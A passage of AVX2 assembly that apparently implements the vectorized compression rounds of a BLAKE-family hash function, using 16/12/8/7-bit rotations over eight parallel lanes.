vpxor ymm14, ymm14, ymm2
vpxor ymm15, ymm15, ymm3
vbroadcasti128 ymm8, xmmword ptr [ROT16+rip]
vpshufb ymm12, ymm12, ymm8
vpshufb ymm13, ymm13, ymm8
vpshufb ymm14, ymm14, ymm8
vpshufb ymm15, ymm15, ymm8
vpaddd ymm8, ymm12, ymmword ptr [rsp+0x200]
vpaddd ymm9, ymm9, ymm13
vpaddd ymm10, ymm10, ymm14
vpaddd ymm11, ymm11, ymm15
vpxor ymm4, ymm4, ymm8
vpxor ymm5, ymm5, ymm9
vpxor ymm6, ymm6, ymm10
vpxor ymm7, ymm7, ymm11
vmovdqa ymmword ptr [rsp+0x200], ymm8
vpsrld ymm8, ymm4, 12
vpslld ymm4, ymm4, 20
vpor ymm4, ymm4, ymm8
vpsrld ymm8, ymm5, 12
vpslld ymm5, ymm5, 20
vpor ymm5, ymm5, ymm8
vpsrld ymm8, ymm6, 12
vpslld ymm6, ymm6, 20
vpor ymm6, ymm6, ymm8
vpsrld ymm8, ymm7, 12
vpslld ymm7, ymm7, 20
vpor ymm7, ymm7, ymm8
vpaddd ymm0, ymm0, ymmword ptr [rsp+0x80]
vpaddd ymm1, ymm1, ymmword ptr [rsp+0x180]
vpaddd ymm2, ymm2, ymmword ptr [rsp+0x40]
vpaddd ymm3, ymm3, ymmword ptr [rsp+0x1C0]
vpaddd ymm0, ymm0, ymm4
vpaddd ymm1, ymm1, ymm5
vpaddd ymm2, ymm2, ymm6
vpaddd ymm3, ymm3, ymm7
vpxor ymm12, ymm12, ymm0
vpxor ymm13, ymm13, ymm1
vpxor ymm14, ymm14, ymm2
vpxor ymm15, ymm15, ymm3
vbroadcasti128 ymm8, xmmword ptr [ROT8+rip]
vpshufb ymm12, ymm12, ymm8
vpshufb ymm13, ymm13, ymm8
vpshufb ymm14, ymm14, ymm8
vpshufb ymm15, ymm15, ymm8
vpaddd ymm8, ymm12, ymmword ptr [rsp+0x200]
vpaddd ymm9, ymm9, ymm13
vpaddd ymm10, ymm10, ymm14
vpaddd ymm11, ymm11, ymm15
vpxor ymm4, ymm4, ymm8
vpxor ymm5, ymm5, ymm9
vpxor ymm6, ymm6, ymm10
vpxor ymm7, ymm7, ymm11
vmovdqa ymmword ptr [rsp+0x200], ymm8
vpsrld ymm8, ymm4, 7
vpslld ymm4, ymm4, 25
vpor ymm4, ymm4, ymm8
vpsrld ymm8, ymm5, 7
vpslld ymm5, ymm5, 25
vpor ymm5, ymm5, ymm8
vpsrld ymm8, ymm6, 7
vpslld ymm6, ymm6, 25
vpor ymm6, ymm6, ymm8
vpsrld ymm8, ymm7, 7
vpslld ymm7, ymm7, 25
vpor ymm7, ymm7, ymm8
vpaddd ymm0, ymm0, ymmword ptr [rsp+0xC0]
vpaddd ymm1, ymm1, ymmword ptr [rsp+0x120]
vpaddd ymm2, ymm2, ymmword ptr [rsp+0x160]
vpaddd ymm3, ymm3, ymmword ptr [rsp+0x100]
vpaddd ymm0, ymm0, ymm5
vpaddd ymm1, ymm1, ymm6
vpaddd ymm2, ymm2, ymm7
vpaddd ymm3, ymm3, ymm4
vpxor ymm15, ymm15, ymm0
vpxor ymm12, ymm12, ymm1
vpxor ymm13, ymm13, ymm2
vpxor ymm14, ymm14, ymm3
vbroadcasti128 ymm8, xmmword ptr [ROT16+rip]
vpshufb ymm15, ymm15, ymm8
vpshufb ymm12, ymm12, ymm8
vpshufb ymm13, ymm13, ymm8
vpshufb ymm14, ymm14, ymm8
vpaddd ymm10, ymm10, ymm15
vpaddd ymm11, ymm11, ymm12
vpaddd ymm8, ymm13, ymmword ptr [rsp+0x200]
vpaddd ymm9, ymm9, ymm14
vpxor ymm5, ymm5, ymm10
vpxor ymm6, ymm6, ymm11
vpxor ymm7, ymm7, ymm8
vpxor ymm4, ymm4, ymm9
vmovdqa ymmword ptr [rsp+0x200], ymm8
vpsrld ymm8, ymm5, 12
vpslld ymm5, ymm5, 20
vpor ymm5, ymm5, ymm8
vpsrld ymm8, ymm6, 12
vpslld ymm6, ymm6, 20
vpor ymm6, ymm6, ymm8
vpsrld ymm8, ymm7, 12
vpslld ymm7, ymm7, 20
vpor ymm7, ymm7, ymm8
vpsrld ymm8, ymm4, 12
vpslld ymm4, ymm4, 20
vpor ymm4, ymm4, ymm8
vpaddd ymm0, ymm0, ymmword ptr [rsp+0xA0]
vpaddd ymm1, ymm1, ymmword ptr [rsp]
vpaddd ymm2, ymm2, ymmword ptr [rsp+0x1E0]
vpaddd ymm3, ymm3, ymmword ptr [rsp+0x20]
vpaddd ymm0, ymm0, ymm5
vpaddd ymm1, ymm1, ymm6
vpaddd ymm2, ymm2, ymm7
vpaddd ymm3, ymm3, ymm4
vpxor ymm15, ymm15, ymm0
vpxor ymm12, ymm12, ymm1
vpxor ymm13, ymm13, ymm2
vpxor ymm14, ymm14, ymm3
vbroadcasti128 ymm8, xmmword ptr [ROT8+rip]
vpshufb ymm15, ymm15, ymm8
vpshufb ymm12, ymm12, ymm8
vpshufb ymm13, ymm13, ymm8
vpshufb ymm14, ymm14, ymm8
vpaddd ymm10, ymm10, ymm15
vpaddd ymm11, ymm11, ymm12
vpaddd ymm8, ymm13, ymmword ptr [rsp+0x200]
vpaddd ymm9, ymm9, ymm14
vpxor ymm5, ymm5, ymm10
vpxor ymm6, ymm6, ymm11
vpxor ymm7, ymm7, ymm8
vpxor ymm4, ymm4, ymm9
vmovdqa ymmword ptr [rsp+0x200], ymm8
vpsrld ymm8, ymm5, 7
vpslld ymm5, ymm5, 25
vpor ymm5, ymm5, ymm8
vpsrld ymm8, ymm6, 7
vpslld ymm6, ymm6, 25
vpor ymm6, ymm6, ymm8
vpsrld ymm8, ymm7, 7
vpslld ymm7, ymm7, 25
vpor ymm7, ymm7, ymm8
vpsrld ymm8, ymm4, 7
vpslld ymm4, ymm4, 25
vpor ymm4, ymm4, ymm8
vpaddd ymm0, ymm0, ymmword ptr [rsp+0x140]
vpaddd ymm1, ymm1, ymmword ptr [rsp+0x180]
vpaddd ymm2, ymm2, ymmword ptr [rsp+0x1C0]
vpaddd ymm3, ymm3, ymmword ptr [rsp+0x1A0]
vpaddd ymm0, ymm0, ymm4
vpaddd ymm1, ymm1, ymm5
vpaddd ymm2, ymm2, ymm6
vpaddd ymm3, ymm3, ymm7
vpxor ymm12, ymm12, ymm0
vpxor ymm13, ymm13, ymm1
vpxor ymm14, ymm14, ymm2
vpxor ymm15, ymm15, ymm3
vbroadcasti128 ymm8, xmmword ptr [ROT16+rip]
vpshufb ymm12, ymm12, ymm8
vpshufb ymm13, ymm13, ymm8
vpshufb ymm14, ymm14, ymm8
vpshufb ymm15, ymm15, ymm8
vpaddd ymm8, ymm12, ymmword ptr [rsp+0x200]
vpaddd ymm9, ymm9, ymm13
vpaddd ymm10, ymm10, ymm14
vpaddd ymm11, ymm11, ymm15
vpxor ymm4, ymm4, ymm8
vpxor ymm5, ymm5, ymm9
vpxor ymm6, ymm6, ymm10
vpxor ymm7, ymm7, ymm11
vmovdqa ymmword ptr [rsp+0x200], ymm8
vpsrld ymm8, ymm4, 12
vpslld ymm4, ymm4, 20
vpor ymm4, ymm4, ymm8
vpsrld ymm8, ymm5, 12
vpslld ymm5, ymm5, 20
vpor ymm5, ymm5, ymm8
vpsrld ymm8, ymm6, 12
vpslld ymm6, ymm6, 20
vpor ymm6, ymm6, ymm8
vpsrld ymm8, ymm7, 12
vpslld ymm7, ymm7, 20
vpor ymm7, ymm7, ymm8
vpaddd ymm0, ymm0, ymmword ptr [rsp+0xE0]
vpaddd ymm1, ymm1, ymmword ptr [rsp+0x120]
vpaddd ymm2, ymm2, ymmword ptr [rsp+0x60]
vpaddd ymm3, ymm3, ymmword ptr [rsp+0x1E0]
vpaddd ymm0, ymm0, ymm4
vpaddd ymm1, ymm1, ymm5
vpaddd ymm2, ymm2, ymm6
vpaddd ymm3, ymm3, ymm7
vpxor ymm12, ymm12, ymm0
vpxor ymm13, ymm13, ymm1
vpxor ymm14, ymm14, ymm2
vpxor ymm15, ymm15, ymm3
vbroadcasti128 ymm8, xmmword ptr [ROT8+rip]
vpshufb ymm12, ymm12, ymm8
vpshufb ymm13, ymm13, ymm8
vpshufb ymm14, ymm14, ymm8
vpshufb ymm15, ymm15, ymm8
vpaddd ymm8, ymm12, ymmword ptr [rsp+0x200]
vpaddd ymm9, ymm9, ymm13
vpaddd ymm10, ymm10, ymm14
vpaddd ymm11, ymm11, ymm15
vpxor ymm4, ymm4, ymm8
vpxor ymm5, ymm5, ymm9
vpxor ymm6, ymm6, ymm10
vpxor ymm7, ymm7, ymm11
vmovdqa ymmword ptr [rsp+0x200], ymm8
vpsrld ymm8, ymm4, 7
vpslld ymm4, ymm4, 25
vpor ymm4, ymm4, ymm8
vpsrld ymm8, ymm5, 7
vpslld ymm5, ymm5, 25
vpor ymm5, ymm5, ymm8
vpsrld ymm8, ymm6, 7
vpslld ymm6, ymm6, 25
vpor ymm6, ymm6, ymm8
vpsrld ymm8, ymm7, 7
vpslld ymm7, ymm7, 25
vpor ymm7, ymm7, ymm8
vpaddd ymm0, ymm0, ymmword ptr [rsp+0x80]
vpaddd ymm1, ymm1, ymmword ptr [rsp+0x160]
vpaddd ymm2, ymm2, ymmword ptr [rsp+0xA0]
vpaddd ymm3, ymm3, ymmword ptr [rsp+0x20]
vpaddd ymm0, ymm0, ymm5
vpaddd ymm1, ymm1, ymm6
vpaddd ymm2, ymm2, ymm7
vpaddd ymm3, ymm3, ymm4
vpxor ymm15, ymm15, ymm0
vpxor ymm12, ymm12, ymm1
vpxor ymm13, ymm13, ymm2
vpxor ymm14, ymm14, ymm3
vbroadcasti128 ymm8, xmmword ptr [ROT16+rip]
vpshufb ymm15, ymm15, ymm8
vpshufb ymm12, ymm12, ymm8
vpshufb ymm13, ymm13, ymm8
vpshufb ymm14, ymm14, ymm8
vpaddd ymm10, ymm10, ymm15
vpaddd ymm11, ymm11, ymm12
vpaddd ymm8, ymm13, ymmword ptr [rsp+0x200]
vpaddd ymm9, ymm9, ymm14
vpxor ymm5, ymm5, ymm10
vpxor ymm6, ymm6, ymm11
vpxor ymm7, ymm7, ymm8
vpxor ymm4, ymm4, ymm9
vmovdqa ymmword ptr [rsp+0x200], ymm8
vpsrld ymm8, ymm5, 12
vpslld ymm5, ymm5, 20
vpor ymm5, ymm5, ymm8
vpsrld ymm8, ymm6, 12
vpslld ymm6, ymm6, 20
vpor ymm6, ymm6, ymm8
vpsrld ymm8, ymm7, 12
vpslld ymm7, ymm7, 20
vpor ymm7, ymm7, ymm8
vpsrld ymm8, ymm4, 12
vpslld ymm4, ymm4, 20
vpor ymm4, ymm4, ymm8
vpaddd ymm0, ymm0, ymmword ptr [rsp]
vpaddd ymm1, ymm1, ymmword ptr [rsp+0x40]
vpaddd ymm2, ymm2, ymmword ptr [rsp+0x100]
vpaddd ymm3, ymm3, ymmword ptr [rsp+0xC0]
vpaddd ymm0, ymm0, ymm5
vpaddd ymm1, ymm1, ymm6
vpaddd ymm2, ymm2, ymm7
vpaddd ymm3, ymm3, ymm4
vpxor ymm15, ymm15, ymm0
vpxor ymm12, ymm12, ymm1
vpxor ymm13, ymm13, ymm2
vpxor ymm14, ymm14, ymm3
vbroadcasti128 ymm8, xmmword ptr [ROT8+rip]
vpshufb ymm15, ymm15, ymm8
vpshufb ymm12, ymm12, ymm8
vpshufb ymm13, ymm13, ymm8
vpshufb ymm14, ymm14, ymm8
vpaddd ymm10, ymm10, ymm15
vpaddd ymm11, ymm11, ymm12
vpaddd ymm8, ymm13, ymmword ptr [rsp+0x200]
vpaddd ymm9, ymm9, ymm14
vpxor ymm5, ymm5, ymm10
vpxor ymm6, ymm6, ymm11
vpxor ymm7, ymm7, ymm8
vpxor ymm4, ymm4, ymm9
vmovdqa ymmword ptr [rsp+0x200], ymm8
vpsrld ymm8, ymm5, 7
vpslld ymm5, ymm5, 25
vpor ymm5, ymm5, ymm8
vpsrld ymm8, ymm6, 7
vpslld ymm6, ymm6, 25
vpor ymm6, ymm6, ymm8
vpsrld ymm8, ymm7, 7
vpslld ymm7, ymm7, 25
vpor ymm7, ymm7, ymm8
vpsrld ymm8, ymm4, 7
vpslld ymm4, ymm4, 25
vpor ymm4, ymm4, ymm8
vpaddd ymm0, ymm0, ymmword ptr [rsp+0x180]
vpaddd ymm1, ymm1, ymmword ptr [rsp+0x120]
vpaddd ymm2, ymm2, ymmword ptr [rsp+0x1E0]
vpaddd ymm3, ymm3, ymmword ptr [rsp+0x1C0]
vpaddd ymm0, ymm0, ymm4
vpaddd ymm1, ymm1, ymm5
vpaddd ymm2, ymm2, ymm6
vpaddd ymm3, ymm3, ymm7
vpxor ymm12, ymm12, ymm0
vpxor ymm13, ymm13, ymm1
vpxor ymm14, ymm14, ymm2
vpxor ymm15, ymm15, ymm3
vbroadcasti128 ymm8, xmmword ptr [ROT16+rip]
vpshufb ymm12, ymm12, ymm8
vpshufb ymm13, ymm13, ymm8
vpshufb ymm14, ymm14, ymm8
vpshufb ymm15, ymm15, ymm8
vpaddd ymm8, ymm12, ymmword ptr [rsp+0x200]
vpaddd ymm9, ymm9, ymm13
vpaddd ymm10, ymm10, ymm14
vpaddd ymm11, ymm11, ymm15
vpxor ymm4, ymm4, ymm8
vpxor ymm5, ymm5, ymm9
vpxor ymm6, ymm6, ymm10
vpxor ymm7, ymm7, ymm11
vmovdqa ymmword ptr [rsp+0x200], ymm8
vpsrld ymm8, ymm4, 12
vpslld ymm4, ymm4, 20
vpor ymm4, ymm4, ymm8
vpsrld ymm8, ymm5, 12
vpslld ymm5, ymm5, 20
vpor ymm5, ymm5, ymm8
vpsrld ymm8, ymm6, 12
vpslld ymm6, ymm6, 20
vpor ymm6, ymm6, ymm8
vpsrld ymm8, ymm7, 12
vpslld ymm7, ymm7, 20
vpor ymm7, ymm7, ymm8
vpaddd ymm0, ymm0, ymmword ptr [rsp+0x1A0]
vpaddd ymm1, ymm1, ymmword ptr [rsp+0x160]
vpaddd ymm2, ymm2, ymmword ptr [rsp+0x140]
vpaddd ymm3, ymm3, ymmword ptr [rsp+0x100]
vpaddd ymm0, ymm0, ymm4
vpaddd ymm1, ymm1, ymm5
vpaddd ymm2, ymm2, ymm6
vpaddd ymm3, ymm3, ymm7
vpxor ymm12, ymm12, ymm0
vpxor ymm13, ymm13, ymm1
vpxor ymm14, ymm14, ymm2
vpxor ymm15, ymm15, ymm3
vbroadcasti128 ymm8, xmmword ptr [ROT8+rip]
vpshufb ymm12, ymm12, ymm8
vpshufb ymm13, ymm13, ymm8
vpshufb ymm14, ymm14, ymm8
vpshufb ymm15, ymm15, ymm8
vpaddd ymm8, ymm12, ymmword ptr [rsp+0x200]
vpaddd ymm9, ymm9, ymm13
vpaddd ymm10, ymm10, ymm14
vpaddd ymm11, ymm11, ymm15
vpxor ymm4, ymm4, ymm8
vpxor ymm5, ymm5, ymm9
vpxor ymm6, ymm6, ymm10
vpxor ymm7, ymm7, ymm11
vmovdqa ymmword ptr [rsp+0x200], ymm8
vpsrld ymm8, ymm4, 7
vpslld ymm4, ymm4, 25
vpor ymm4, ymm4, ymm8
vpsrld ymm8, ymm5, 7
vpslld ymm5, ymm5, 25
vpor ymm5, ymm5, ymm8
vpsrld ymm8, ymm6, 7
vpslld ymm6, ymm6, 25
vpor ymm6, ymm6, ymm8
vpsrld ymm8, ymm7, 7
vpslld ymm7, ymm7, 25
vpor ymm7, ymm7, ymm8
vpaddd ymm0, ymm0, ymmword ptr [rsp+0xE0]
vpaddd ymm1, ymm1, ymmword ptr [rsp+0xA0]
vpaddd ymm2, ymm2, ymmword ptr [rsp]
vpaddd ymm3, ymm3, ymmword ptr [rsp+0xC0]
vpaddd ymm0, ymm0, ymm5
vpaddd ymm1, ymm1, ymm6
vpaddd ymm2, ymm2, ymm7
vpaddd ymm3, ymm3, ymm4
vpxor ymm15, ymm15, ymm0
vpxor ymm12, ymm12, ymm1
vpxor ymm13, ymm13, ymm2
vpxor ymm14, ymm14, ymm3
vbroadcasti128 ymm8, xmmword ptr [ROT16+rip]
vpshufb ymm15, ymm15, ymm8
vpshufb ymm12, ymm12, ymm8
vpshufb ymm13, ymm13, ymm8
vpshufb ymm14, ymm14, ymm8
vpaddd ymm10, ymm10, ymm15
vpaddd ymm11, ymm11, ymm12
vpaddd ymm8, ymm13, ymmword ptr [rsp+0x200]
vpaddd ymm9, ymm9, ymm14
vpxor ymm5, ymm5, ymm10
vpxor ymm6, ymm6, ymm11
vpxor ymm7, ymm7, ymm8
vpxor ymm4, ymm4, ymm9
vmovdqa ymmword ptr [rsp+0x200], ymm8
vpsrld ymm8, ymm5, 12
vpslld ymm5, ymm5, 20
vpor ymm5, ymm5, ymm8
vpsrld ymm8, ymm6, 12
vpslld ymm6, ymm6, 20
vpor ymm6, ymm6, ymm8
vpsrld ymm8, ymm7, 12
vpslld ymm7, ymm7, 20
vpor ymm7, ymm7, ymm8
vpsrld ymm8, ymm4, 12
vpslld ymm4, ymm4, 20
vpor ymm4, ymm4, ymm8
vpaddd ymm0, ymm0, ymmword ptr [rsp+0x40]
vpaddd ymm1, ymm1, ymmword ptr [rsp+0x60]
vpaddd ymm2, ymm2, ymmword ptr [rsp+0x20]
vpaddd ymm3, ymm3, ymmword ptr [rsp+0x80]
vpaddd ymm0, ymm0, ymm5
vpaddd ymm1, ymm1, ymm6
vpaddd ymm2, ymm2, ymm7
vpaddd ymm3, ymm3, ymm4
vpxor ymm15, ymm15, ymm0
vpxor ymm12, ymm12, ymm1
vpxor ymm13, ymm13, ymm2
vpxor ymm14, ymm14, ymm3
vbroadcasti128 ymm8, xmmword ptr [ROT8+rip]
vpshufb ymm15, ymm15, ymm8
vpshufb ymm12, ymm12, ymm8
vpshufb ymm13, ymm13, ymm8
vpshufb ymm14, ymm14, ymm8
vpaddd ymm10, ymm10, ymm15
vpaddd ymm11, ymm11, ymm12
vpaddd ymm8, ymm13, ymmword ptr [rsp+0x200]
vpaddd ymm9, ymm9, ymm14
vpxor ymm5, ymm5, ymm10
vpxor ymm6, ymm6, ymm11
vpxor ymm7, ymm7, ymm8
vpxor ymm4, ymm4, ymm9
vmovdqa ymmword ptr [rsp+0x200], ymm8
vpsrld ymm8, ymm5, 7
vpslld ymm5, ymm5, 25
vpor ymm5, ymm5, ymm8
vpsrld ymm8, ymm6, 7
vpslld ymm6, ymm6, 25
vpor ymm6, ymm6, ymm8
vpsrld ymm8, ymm7, 7
vpslld ymm7, ymm7, 25
vpor ymm7, ymm7, ymm8
vpsrld ymm8, ymm4, 7
vpslld ymm4, ymm4, 25
vpor ymm4, ymm4, ymm8
vpaddd ymm0, ymm0, ymmword ptr [rsp+0x120]
vpaddd ymm1, ymm1, ymmword ptr [rsp+0x160]
vpaddd ymm2, ymm2, ymmword ptr [rsp+0x100]
vpaddd ymm3, ymm3, ymmword ptr [rsp+0x1E0]
vpaddd ymm0, ymm0, ymm4
vpaddd ymm1, ymm1, ymm5
vpaddd ymm2, ymm2, ymm6
vpaddd ymm3, ymm3, ymm7
vpxor ymm12, ymm12, ymm0
vpxor ymm13, ymm13, ymm1
vpxor ymm14, ymm14, ymm2
vpxor ymm15, ymm15, ymm3
vbroadcasti128 ymm8, xmmword ptr [ROT16+rip]
vpshufb ymm12, ymm12, ymm8
vpshufb ymm13, ymm13, ymm8
vpshufb ymm14, ymm14, ymm8
vpshufb ymm15, ymm15, ymm8
vpaddd ymm8, ymm12, ymmword ptr [rsp+0x200]
vpaddd ymm9, ymm9, ymm13
vpaddd ymm10, ymm10, ymm14
vpaddd ymm11, ymm11, ymm15
vpxor ymm4, ymm4, ymm8
vpxor ymm5, ymm5, ymm9
vpxor ymm6, ymm6, ymm10
vpxor ymm7, ymm7, ymm11
vmovdqa ymmword ptr [rsp+0x200], ymm8
vpsrld ymm8, ymm4, 12
vpslld ymm4, ymm4, 20
vpor ymm4, ymm4, ymm8
vpsrld ymm8, ymm5, 12
vpslld ymm5, ymm5, 20
vpor ymm5, ymm5, ymm8
vpsrld ymm8, ymm6, 12
vpslld ymm6, ymm6, 20
vpor ymm6, ymm6, ymm8
vpsrld ymm8, ymm7, 12
vpslld ymm7, ymm7, 20
vpor ymm7, ymm7, ymm8
vpaddd ymm0, ymm0, ymmword ptr [rsp+0x1C0]
vpaddd ymm1, ymm1, ymmword ptr [rsp+0xA0]
vpaddd ymm2, ymm2, ymmword ptr [rsp+0x180]
vpaddd ymm3, ymm3, ymmword ptr [rsp+0x20]
vpaddd ymm0, ymm0, ymm4
vpaddd ymm1, ymm1, ymm5
vpaddd ymm2, ymm2, ymm6
vpaddd ymm3, ymm3, ymm7
vpxor ymm12, ymm12, ymm0
vpxor ymm13, ymm13, ymm1
vpxor ymm14, ymm14, ymm2
vpxor ymm15, ymm15, ymm3
vbroadcasti128 ymm8, xmmword ptr [ROT8+rip]
vpshufb ymm12, ymm12, ymm8
vpshufb ymm13, ymm13, ymm8
vpshufb ymm14, ymm14, ymm8
vpshufb ymm15, ymm15, ymm8
vpaddd ymm8, ymm12, ymmword ptr [rsp+0x200]
vpaddd ymm9, ymm9, ymm13
vpaddd ymm10, ymm10, ymm14
vpaddd ymm11, ymm11, ymm15
vpxor ymm4, ymm4, ymm8
vpxor ymm5, ymm5, ymm9
vpxor ymm6, ymm6, ymm10
vpxor ymm7, ymm7, ymm11
vmovdqa ymmword ptr [rsp+0x200], ymm8
vpsrld ymm8, ymm4, 7
vpslld ymm4, ymm4, 25
vpor ymm4, ymm4, ymm8
vpsrld ymm8, ymm5, 7
vpslld ymm5, ymm5, 25
vpor ymm5, ymm5, ymm8
vpsrld ymm8, ymm6, 7
vpslld ymm6, ymm6, 25
vpor ymm6, ymm6, ymm8
vpsrld ymm8, ymm7, 7
vpslld ymm7, ymm7, 25
vpor ymm7, ymm7, ymm8
vpaddd ymm0, ymm0, ymmword ptr [rsp+0x1A0]
vpaddd ymm1, ymm1, ymmword ptr [rsp]
vpaddd ymm2, ymm2, ymmword ptr [rsp+0x40]
vpaddd ymm3, ymm3, ymmword ptr [rsp+0x80]
vpaddd ymm0, ymm0, ymm5
vpaddd ymm1, ymm1, ymm6
vpaddd ymm2, ymm2, ymm7
vpaddd ymm3, ymm3, ymm4
vpxor ymm15, ymm15, ymm0
vpxor ymm12, ymm12, ymm1
vpxor ymm13, ymm13, ymm2
vpxor ymm14, ymm14, ymm3
vbroadcasti128 ymm8, xmmword ptr [ROT16+rip]
vpshufb ymm15, ymm15, ymm8
vpshufb ymm12, ymm12, ymm8
vpshufb ymm13, ymm13, ymm8
vpshufb ymm14, ymm14, ymm8
vpaddd ymm10, ymm10, ymm15
vpaddd ymm11, ymm11, ymm12
vpaddd ymm8, ymm13, ymmword ptr [rsp+0x200]
vpaddd ymm9, ymm9, ymm14
vpxor ymm5, ymm5, ymm10
vpxor ymm6, ymm6, ymm11
vpxor ymm7, ymm7, ymm8
vpxor ymm4, ymm4, ymm9
vmovdqa ymmword ptr [rsp+0x200], ymm8
vpsrld ymm8, ymm5, 12
vpslld ymm5, ymm5, 20
vpor ymm5, ymm5, ymm8
vpsrld ymm8, ymm6, 12
vpslld ymm6, ymm6, 20
vpor ymm6, ymm6, ymm8
vpsrld ymm8, ymm7, 12
vpslld ymm7, ymm7, 20
vpor ymm7, ymm7, ymm8
vpsrld ymm8, ymm4, 12
vpslld ymm4, ymm4, 20
vpor ymm4, ymm4, ymm8
vpaddd ymm0, ymm0, ymmword ptr [rsp+0x60]
vpaddd ymm1, ymm1, ymmword ptr [rsp+0x140]
vpaddd ymm2, ymm2, ymmword ptr [rsp+0xC0]
vpaddd ymm3, ymm3, ymmword ptr [rsp+0xE0]
vpaddd ymm0, ymm0, ymm5
vpaddd ymm1, ymm1, ymm6
vpaddd ymm2, ymm2, ymm7
vpaddd ymm3, ymm3, ymm4
vpxor ymm15, ymm15, ymm0
vpxor ymm12, ymm12, ymm1
vpxor ymm13, ymm13, ymm2
vpxor ymm14, ymm14, ymm3
vbroadcasti128 ymm8, xmmword ptr [ROT8+rip]
vpshufb ymm15, ymm15, ymm8
vpshufb ymm12, ymm12, ymm8
vpshufb ymm13, ymm13, ymm8
vpshufb ymm14, ymm14, ymm8
vpaddd ymm10, ymm10, ymm15
vpaddd ymm11, ymm11, ymm12
vpaddd ymm8, ymm13, ymmword ptr [rsp+0x200]
vpaddd ymm9, ymm9, ymm14
vpxor ymm5, ymm5, ymm10
vpxor ymm6, ymm6, ymm11
vpxor ymm7, ymm7, ymm8
vpxor ymm4, ymm4, ymm9
vmovdqa ymmword ptr [rsp+0x200], ymm8
vpsrld ymm8, ymm5, 7
vpslld ymm5, ymm5, 25
vpor ymm5, ymm5, ymm8
vpsrld ymm8, ymm6, 7
vpslld ymm6, ymm6, 25
vpor ymm6, ymm6, ymm8
vpsrld ymm8, ymm7, 7
vpslld ymm7, ymm7, 25
vpor ymm7, ymm7, ymm8
vpsrld ymm8, ymm4, 7
vpslld ymm4, ymm4, 25
vpor ymm4, ymm4, ymm8
vpaddd ymm0, ymm0, ymmword ptr [rsp+0x160]
vpaddd ymm1, ymm1, ymmword ptr [rsp+0xA0]
vpaddd ymm2, ymm2, ymmword ptr [rsp+0x20]
vpaddd ymm3, ymm3, ymmword ptr [rsp+0x100]
vpaddd ymm0, ymm0, ymm4
vpaddd ymm1, ymm1, ymm5
vpaddd ymm2, ymm2, ymm6
vpaddd ymm3, ymm3, ymm7
vpxor ymm12, ymm12, ymm0
vpxor ymm13, ymm13, ymm1
vpxor ymm14, ymm14, ymm2
vpxor ymm15, ymm15, ymm3
vbroadcasti128 ymm8, xmmword ptr [ROT16+rip]
vpshufb ymm12, ymm12, ymm8
vpshufb ymm13, ymm13, ymm8
vpshufb ymm14, ymm14, ymm8
vpshufb ymm15, ymm15, ymm8
vpaddd ymm8, ymm12, ymmword ptr [rsp+0x200]
vpaddd ymm9, ymm9, ymm13
vpaddd ymm10, ymm10, ymm14
vpaddd ymm11, ymm11, ymm15
vpxor ymm4, ymm4, ymm8
vpxor ymm5, ymm5, ymm9
vpxor ymm6, ymm6, ymm10
vpxor ymm7, ymm7, ymm11
vmovdqa ymmword ptr [rsp+0x200], ymm8
vpsrld ymm8, ymm4, 12
vpslld ymm4, ymm4, 20
vpor ymm4, ymm4, ymm8
vpsrld ymm8, ymm5, 12
vpslld ymm5, ymm5, 20
vpor ymm5, ymm5, ymm8
vpsrld ymm8, ymm6, 12
vpslld ymm6, ymm6, 20
vpor ymm6, ymm6, ymm8
vpsrld ymm8, ymm7, 12
vpslld ymm7, ymm7, 20
vpor ymm7, ymm7, ymm8
vpaddd ymm0, ymm0, ymmword ptr [rsp+0x1E0]
vpaddd ymm1, ymm1, ymmword ptr [rsp]
vpaddd ymm2, ymm2, ymmword ptr [rsp+0x120]
vpaddd ymm3, ymm3, ymmword ptr [rsp+0xC0]
vpaddd ymm0, ymm0, ymm4
vpaddd ymm1, ymm1, ymm5
vpaddd ymm2, ymm2, ymm6
vpaddd ymm3, ymm3, ymm7
vpxor ymm12, ymm12, ymm0
vpxor ymm13, ymm13, ymm1
vpxor ymm14, ymm14, ymm2
vpxor ymm15, ymm15, ymm3
vbroadcasti128 ymm8, xmmword ptr [ROT8+rip]
vpshufb ymm12, ymm12, ymm8
vpshufb ymm13, ymm13, ymm8
vpshufb ymm14, ymm14, ymm8
vpshufb ymm15, ymm15, ymm8
vpaddd ymm8, ymm12, ymmword ptr [rsp+0x200]
vpaddd ymm9, ymm9, ymm13
vpaddd ymm10, ymm10, ymm14
vpaddd ymm11, ymm11, ymm15
vpxor ymm4, ymm4, ymm8
vpxor ymm5, ymm5, ymm9
vpxor ymm6, ymm6, ymm10
vpxor ymm7, ymm7, ymm11
vmovdqa ymmword ptr [rsp+0x200], ymm8
vpsrld ymm8, ymm4, 7
vpslld ymm4, ymm4, 25
vpor ymm4, ymm4, ymm8
vpsrld ymm8, ymm5, 7
vpslld ymm5, ymm5, 25
vpor ymm5, ymm5, ymm8
vpsrld ymm8, ymm6, 7
vpslld ymm6, ymm6, 25
vpor ymm6, ymm6, ymm8
vpsrld ymm8, ymm7, 7
vpslld ymm7, ymm7, 25
vpor ymm7, ymm7, ymm8
vpaddd ymm0, ymm0, ymmword ptr [rsp+0x1C0]
vpaddd ymm1, ymm1, ymmword ptr [rsp+0x40]
vpaddd ymm2, ymm2, ymmword ptr [rsp+0x60]
vpaddd ymm3, ymm3, ymmword ptr [rsp+0xE0]
vpaddd ymm0, ymm0, ymm5
vpaddd ymm1, ymm1, ymm6
vpaddd ymm2, ymm2, ymm7
vpaddd ymm3, ymm3, ymm4
vpxor ymm15, ymm15, ymm0
vpxor ymm12, ymm12, ymm1
vpxor ymm13, ymm13, ymm2
vpxor ymm14, ymm14, ymm3
vbroadcasti128 ymm8, xmmword ptr [ROT16+rip]
vpshufb ymm15, ymm15, ymm8
vpshufb ymm12, ymm12, ymm8
vpshufb ymm13, ymm13, ymm8
vpshufb ymm14, ymm14, ymm8
vpaddd ymm10, ymm10, ymm15
vpaddd ymm11, ymm11, ymm12
vpaddd ymm8, ymm13, ymmword ptr [rsp+0x200]
vpaddd ymm9, ymm9, ymm14
vpxor ymm5, ymm5, ymm10
vpxor ymm6, ymm6, ymm11
vpxor ymm7, ymm7, ymm8
vpxor ymm4, ymm4, ymm9
vmovdqa ymmword ptr [rsp+0x200], ymm8
vpsrld ymm8, ymm5, 12
vpslld ymm5, ymm5, 20
vpor ymm5, ymm5, ymm8
vpsrld ymm8, ymm6, 12
vpslld ymm6, ymm6, 20
vpor ymm6, ymm6, ymm8
vpsrld ymm8, ymm7, 12
vpslld ymm7, ymm7, 20
vpor ymm7, ymm7, ymm8
vpsrld ymm8, ymm4, 12
vpslld ymm4, ymm4, 20
